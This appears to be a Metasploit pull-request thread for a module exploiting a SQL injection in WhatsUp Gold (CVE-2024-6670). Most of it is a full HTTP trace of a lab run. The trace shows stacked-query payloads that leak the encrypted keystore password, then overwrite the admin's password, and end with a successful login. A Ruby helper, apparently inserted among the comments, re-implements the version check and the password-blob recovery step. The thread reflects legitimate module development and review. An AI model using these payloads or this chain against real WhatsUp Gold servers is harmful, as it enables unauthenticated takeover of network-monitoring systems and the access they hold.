WhatsUp Gold SQL Injection (CVE-2024-6670) Module #19436
Conversation
WhatsUp Gold SQL Injection (CVE-2024-6670)
cleanup, version check, documentation
Added documentation, version check and some minor code improvements. Also tested against one more vulnerable version. The module is ready for review:
Unfortunately, the vendor only grants trial licenses for the most recent version.
I can share a PCAP file with the traffic when I run the module in my lab if that would help to confirm that the module works as described?
I've sent an email with the debugging output and a PCAP file.
Hello @h4x-x0r, probably the email got blocked / flagged, are you by any chance in the Metasploit Slack ? |
Yes, I'll send you a message via Slack. |
Reviewed logs and source code. Looks good to me.
Logs
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > use auxiliary/admin/http/whatsup_gold_sqli
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS 192.168.217.143
RHOSTS => 192.168.217.143
msf6 auxiliary(admin/http/whatsup_gold_sqli) > show options
Module options (auxiliary/admin/http/whatsup_gold_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
NEW_PASSWORD lpLNEWATnGYb yes Password to be used when creating a new user with admin privileges
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.217.143 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL True no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
USERNAME admin yes Username of which to update the password (default: admin)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set verbose true
verbose => true
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set HTTPTRACE true
HTTPTRACE => true
msf6 auxiliary(admin/http/whatsup_gold_sqli) > exploit
[*] Running module against 192.168.217.143
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /NmConsole/app.json HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: application/json
Last-Modified: Fri, 24 May 2024 06:39:30 GMT
Accept-Ranges: bytes
ETag: "07d4121a5adda1:0"
Server: Microsoft-IIS/10.0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:53 GMT
Content-Length: 8837
{"packages":{"APM":{"css":true,"included":true,"namespace":"APM","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Agent":{"css":true,"included":true,"namespace":"Agent","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"version":"1.0.0"},"Cloud":{"css":true,"included":true,"namespace":"Cloud","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Configured":{"css":true,"included":true,"namespace":"Configured","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Connected":{"css":true,"included":true,"namespace":"Connected","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Core":{"css":true,"included":true,"namespace":"Core","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux"],"theme":"theme-wug","version":"19.1.0"},"LM":{"css":true,"included":true,"namespace":"LM","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug","Agent"],"version":"1.0.0"},"Membership":{"css":true,"included":true,"namespace":"Membership","required":true,"requires":["ext"
,"core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"NMD3":{"css":true,"included":true,"namespace":"NMD3","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"Navigation":{"css":true,"included":true,"namespace":"Navigation","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"Nta":{"css":true,"included":true,"namespace":"Nta","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Reporting":{"css":true,"included":true,"namespace":"Reporting","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Navigation"],"theme":"theme-wug","version":"19.1.0"},"Virtual":{"css":true,"included":true,"namespace":"Virtual","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Wireless":{"css":true,"included":true,"namespace":"Wireless","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Wug":{"css":true,"included":true,"namespace":"Wug","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting"],"theme":"theme-wug","version":"19.1.0"},"classic":{"
css":true,"included":true,"language":{"js":{"input":{"version":"ES5"}}},"namespace":"Ext","required":true,"requires":["ext","core"],"version":"6.6.0"},"cmd":{"version":"6.7.0.63"},"core":{"css":true,"included":true,"required":true,"requires":["ext","classic"],"version":"6.6.0"},"ext":{"css":true,"included":true,"language":{"js":{"input":{"version":"ES5"}}},"license":"dev","namespace":"Ext","required":true,"requires":[],"version":"6.7.0.210"},"font-awesome":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune"],"theme":"theme-neptune","version":"4.7.0"},"theme-base":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic"],"version":"6.6.0"},"theme-crisp":{"css":true,"extend":"theme-neptune","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune"],"version":"6.6.0"},"theme-neptune":{"css":true,"extend":"theme-neutral","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral"],"version":"6.6.0"},"theme-neutral":{"css":true,"extend":"theme-base","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base"],"version":"6.6.0"},"theme-wug":{"css":true,"extend":"ext-theme-crisp","included":true,"namespace":"Theme.wug","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp"],"version":"19.1.0"},"ux":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic"],"version":"6.6.0"}},"js":[{"remote":false,"path":"resources/libs/jquery-3.6.0.min.js"},{"remote":false,"path":"resources/libs/jquery-ui.min.js"},{"remote":false,"path":"resources/libs/v10.0.7-i18next.min.js"},{"remote":false,"path":"resources/libs/i18nextXHRBackend.min.js"},{"remote":false,"path":"resources/libs/datajs-1.1.1.min.js"},{"remo
te":false,"path":"resources/libs/ipaddr.min.js"},{"remote":false,"path":"resources/libs/moment.min.js"},{"remote":false,"path":"resources/libs/jquery.signalR-2.2.0.min.js"},{"remote":true,"path":"/NMConsole/api/realtime/hubs"},{"remote":false,"path":"resources/libs/d3v5.min.js"},{"remote":false,"path":"resources/libs/topojson.min.js"},{"remote":false,"path":"resources/libs/oidc-client.min.js"},{"remote":false,"path":"resources/libs/oidc-client.rsa256.min.js"},{"remote":false,"path":"resources/libs/d3.min.js"},{"remote":false,"path":"resources/libs/d3-collection.min.js"},{"remote":false,"path":"resources/libs/d3-dispatch.min.js"},{"remote":false,"path":"resources/libs/d3-quadtree.min.js"},{"remote":false,"path":"resources/libs/d3-timer.min.js"},{"remote":false,"path":"resources/libs/d3-force.min.js"},{"remote":false,"path":"resources/libs/d3-array.min.js"},{"remote":false,"path":"resources/libs/d3-color.min.js"},{"remote":false,"path":"resources/libs/d3-format.min.js"},{"remote":false,"path":"resources/libs/d3-interpolate.min.js"},{"remote":false,"path":"resources/libs/d3-path.min.js"},{"remote":false,"path":"resources/libs/d3-polygon.min.js"},{"remote":false,"path":"resources/libs/d3-scale.min.js"},{"remote":false,"path":"resources/libs/d3-shape.min.js"},{"remote":false,"path":"resources/libs/d3-selection.min.js"},{"remote":false,"path":"resources/libs/d3-selection-multi.min.js"},{"remote":false,"path":"resources/libs/highcharts.min.js"},{"remote":false,"path":"resources/libs/highcharts-regression.js"},{"remote":false,"path":"resources/libs/highstock.minmax.js"},{"remote":false,"path":"resources/libs/toggles.min.js"},{"remote":false,"path":"resources/libs/xml2json.min.js"},{"path":"app-23.1.3.js"}],"css":[{"remote":false,"exclude":["fashion"],"path":"resources/css/font-awesome.min.css"},{"remote":false,"exclude":["fashion"],"path":"resources/css/font-translation.css"},{"remote":false,"exclude":["fashion"],"path":"resources/css/jquery-ui.min.css"},{"remote":false,"ex
clude":["fashion"],"path":"resources/css/radial-progress.min.css"},{"exclude":["fashion"],"path":"resources/css/toggles.css"},{"exclude":["fashion"],"path":"resources/css/toggles-light.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_1.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_2.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_3.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_4.css"}],"cache":{"enable":true,"deltas":true},"fashion":{"inliner":{"enable":false}},"name":"NM","version":"23.1.3","framework":"ext","toolkit":"classic","theme":"theme-wug","loader":{"cache":"20240523233820","cacheParam":"_dc"},"id":"16f6ac6a-250f-4f0d-b5b7-14211c831454","hash":"71a496e19f9ae7e58f65031506bddad6c65f45f5","profile":"","resources":{"path":"resources"}}
[*] Version retrieved: 23.1.3
[+] The target appears to be vulnerable. Version: 23.1.3
####################
# Request:
####################
POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 71
{"KeyStorePassword":"lpLNEWATnGYb","TrustStorePassword":"lpLNEWATnGYb"}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2j02pdempb44vlrxwhxsmk4m; path=/; secure; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 0
####################
# Request:
####################
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 243
{"deviceId":"94866","classId":"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='vQOSlAItJx'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--","range":"2","n":"6","start":"5","end":"5"}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=uq2wlm5ankvzmtsgazpt3sbs; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 5
false
####################
# Request:
####################
GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=gedyixd4w330wp510g054s1k; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 4930
[{"Id":"ID:0","DisplayName":"No Filter","IsCategory":true},{"Id":"CLASSID:2AED4F63-E83B-4858-8F3E-1683373065DA","DisplayName":"Failover","IsCategory":true},{"Id":"ID:12","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:F7E947E9-BDF0-41C4-B179-E4E9CD208C17","DisplayName":"LM Filter Frequency","IsCategory":true},{"Id":"ID:18","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"ID:19","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:8190340A-F1E2-4B39-A27D-B62E0370F71E","DisplayName":"Network Traffic Analyzer Conversation Partners","IsCategory":true},{"Id":"ID:7","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:4B2DD756-F025-4B71-9AE7-9C602FB94556","DisplayName":"Network Traffic Analyzer Failed Connections","IsCategory":true},{"Id":"ID:8","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:60AA7878-034E-40D8-ABA6-AFE50D8E395A","DisplayName":"Network Traffic Analyzer Interface Traffic","IsCategory":true},{"Id":"ID:9","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:44E2745E-8699-4853-A437-E09DD9171A4B","DisplayName":"Network Traffic Analyzer Suspicious Connections","IsCategory":true},{"Id":"ID:20","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:D3596E60-D462-4DDB-933B-05915DB25C34","DisplayName":"Network Traffic Analyzer Top 
Sender/Receiver","IsCategory":true},{"Id":"ID:10","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:E67C2E8B-F31E-429D-8892-6BF1C9940BC1","DisplayName":"Performance CPU","IsCategory":true},{"Id":"ID:1","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:ADDEA5F5-AF11-448D-9A55-A4F5DFB79AE3","DisplayName":"Performance Disk","IsCategory":true},{"Id":"ID:2","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:2F8AFABF-4F4F-4304-AD4E-B828FAE1D337","DisplayName":"Performance Interface","IsCategory":true},{"Id":"ID:3","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:81EF5B8E-D950-419A-9917-FA2A5B0661B7","DisplayName":"Performance Memory","IsCategory":true},{"Id":"ID:4","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:EDF1024D-8393-4BC0-840C-5A340FF2C08C","DisplayName":"Performance Ping Availability","IsCategory":true},{"Id":"ID:5","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:B967A967-DC54-4FB1-8384-50B83C67CE03","DisplayName":"Performance Ping Response Time","IsCategory":true},{"Id":"ID:6","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:7DDE30A0-20F5-4C47-AEAE-0D578954EEE1","DisplayName":"WhatsUp Health","IsCategory":true},{"Id":"ID:11","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:3E020ECA-42DB-49B8-84A7-300E3219A0B6","DisplayName":"Wireless Access Point Over 
Subscription","IsCategory":true},{"Id":"ID:13","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:61260AB3-9B98-4434-A065-2532C9FC4F6C","DisplayName":"Wireless Access Point RSSI","IsCategory":true},{"Id":"ID:14","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:3B682F7E-2CF0-4978-9FAE-698936BC7B1C","DisplayName":"Wireless CPU","IsCategory":true},{"Id":"ID:15","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:B2170FEE-BEF1-48BA-A893-DDB215F19FB3","DisplayName":"Wireless Excessive Rogues","IsCategory":true},{"Id":"ID:17","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:CD66081C-41A2-4797-B519-ECEC086C8177","DisplayName":"Wireless Memory","IsCategory":true},{"Id":"ID:16","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false}]
[*] Encrypted password: 0x0300000010000000C6FD8CE52D96E5330B56CD53831CA446
####################
# Request:
####################
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 223
{"deviceId":"94866","classId":"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = 0x0300000010000000C6FD8CE52D96E5330B56CD53831CA446 where sUserName = 'admin';--","range":"7","n":"3","start":"3","end":"5"}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=tnbrbdaz2kkpsjbkpve5ugr5; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 5
false
####################
# Request:
####################
POST /NmConsole/User/LoginAjax HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
username=admin&password=lpLNEWATnGYb&rememberMe=false
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXAUTH=BCA616405D1B302CEC3D49BA822DFB85953466E8CBB2F47D42F31A7B2A7C3E3DCFF348ED4816D1C2E4ED91A6EE0E2DB563EFC1BB41B6F033AC44AC6CAE15470EB5C3AF1D7C44AD7EFA4C51F02EE8477A2171E56E194B293F6D3D5D6459087BC5; path=/; secure; HttpOnly; SameSite=Lax, langid=1033; path=/; secure; HttpOnly
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 54
{"authenticated":true,"message":"","username":"admin"}
[+] New password for admin was successfully set:
admin:lpLNEWATnGYb
[+] Login at: https://192.168.217.143/NmConsole/#home
[*] Auxiliary module execution completed
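The trace above has two steps that are easy to get wrong when writing a check or reproducing the flow by hand: the version gate on /NmConsole/app.json, and turning the marker-prefixed, comma-separated byte list that AlertCenterItemsReportThresholds returns into the 0x... varbinary literal the module then writes into WebUser.sPassword. The following Ruby is an added example, not code from the module or from this PR. It assumes Gem::Version in place of the framework's Rex::Version, takes 24.0.0 as the first fixed version from the release notes below, and uses sample bodies constructed from (and trimmed down from) the responses in the log.

```ruby
require 'json'
require 'rubygems' # Gem::Version; Metasploit itself uses Rex::Version

# Constructed excerpt of the /NmConsole/app.json body from the trace, keeping
# only the top-level keys the version check needs (the real body is ~8 KB).
SAMPLE_APP_JSON = '{"name":"NM","version":"23.1.3","framework":"ext","toolkit":"classic"}'

# First fixed release per the PR release notes (vulnerable: < 24.0.0).
FIXED_VERSION = Gem::Version.new('24.0.0')

# Pull the product version out of app.json. Returns nil when the body is not
# JSON or has no well-formed top-level "version" string, so an unexpected
# page (login redirect, error page) never gets classified as vulnerable.
def extract_version(body)
  data = JSON.parse(body)
  return nil unless data.is_a?(Hash)
  v = data['version']
  v.is_a?(String) && v.match?(/\A\d+(\.\d+)*\z/) ? v : nil
rescue JSON::ParserError
  nil
end

# Mirror the module's check: :vulnerable, :safe or :unknown.
def check_version(body)
  v = extract_version(body)
  return :unknown if v.nil?
  Gem::Version.new(v) < FIXED_VERSION ? :vulnerable : :safe
end

# Constructed excerpt of the AlertCenterItemsReportThresholds response after
# the injected UPDATE; 'vQOSlAItJx' is the random marker the module prepended
# to the GlobalSettings value in the trace above.
SAMPLE_THRESHOLDS = <<~JSON
  [{"Id":"ID:0","DisplayName":"No Filter","IsCategory":true},
   {"Id":"ID:12","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false}]
JSON

# The stored value comes back as decimal bytes separated by commas. Find the
# first DisplayName carrying the marker, validate every element is a byte, and
# rebuild the 0x... literal that the follow-up UPDATE WebUser statement uses.
def recover_blob(body, marker)
  rows = JSON.parse(body)
  return nil unless rows.is_a?(Array)
  rows.each do |row|
    name = row.is_a?(Hash) ? row['DisplayName'] : nil
    next unless name.is_a?(String) && name.start_with?(marker)
    bytes = name.delete_prefix(marker).split(',')
    next if bytes.empty?
    next unless bytes.all? { |b| b.match?(/\A\d{1,3}\z/) && b.to_i <= 255 }
    return '0x' + bytes.map { |b| format('%02X', b.to_i) }.join
  end
  nil
rescue JSON::ParserError
  nil
end

if __FILE__ == $PROGRAM_NAME
  puts "check: #{check_version(SAMPLE_APP_JSON)}"
  puts "blob:  #{recover_blob(SAMPLE_THRESHOLDS, 'vQOSlAItJx')}"
end
```

Run with `ruby`; for the trimmed 23.1.3 body it reports :vulnerable, and the recovered blob equals the "Encrypted password" line the module printed. Two points worth noting from the trace itself: the JMXSecurity POST answers 500 even though the value is persisted (the later login with that password succeeds), so a check must read the value back rather than trust the status code; and every response sets a fresh ASP.NET_SessionId, so nothing in the chain depends on session state.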
Hey @h4x-x0r. Two final minor comments, after these are addressed I think it should be good to land.
minor fixes
Release Notes
This is a new module which exploits a SQL injection vulnerability in WhatsUp Gold versions before v24.0.0.
This is a new module which exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670).
Successful exploitation allows an unauthenticated remote attacker to change the password of the admin user.
Verification Steps
msfconsole
use auxiliary/admin/http/whatsup_gold_sqli
set RHOSTS <IP>
run
The password of the admin user will get updated to the one specified in NEW_PASSWORD.
Successfully tested on